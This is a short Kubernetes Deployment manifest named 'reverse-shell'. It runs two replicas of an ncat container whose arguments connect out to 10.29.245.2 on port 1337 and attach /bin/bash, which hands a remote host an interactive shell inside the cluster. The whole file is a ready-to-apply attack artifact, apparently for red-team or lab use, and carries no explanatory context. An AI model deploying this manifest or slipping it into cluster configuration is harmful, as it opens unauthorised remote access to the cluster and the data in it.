apiVersion: apps/v1
kind: Deployment
metadata:
  name: reverse-shell
spec:
  selector:
    matchLabels:
      app: reverse-shell
  replicas: 2
  template:
    metadata:
      labels:
        app: reverse-shell
    spec:
      containers:
      - name: ncat-reverse-shell
        image: raesene/ncat:v1
        args: ['10.29.245.2', '1337', '-e', '/bin/bash']
        resources:
          requests:
            memory: "64Mi"
            cpu: "250m"
          limits:
            memory: "128Mi"
            cpu: "500m"
     
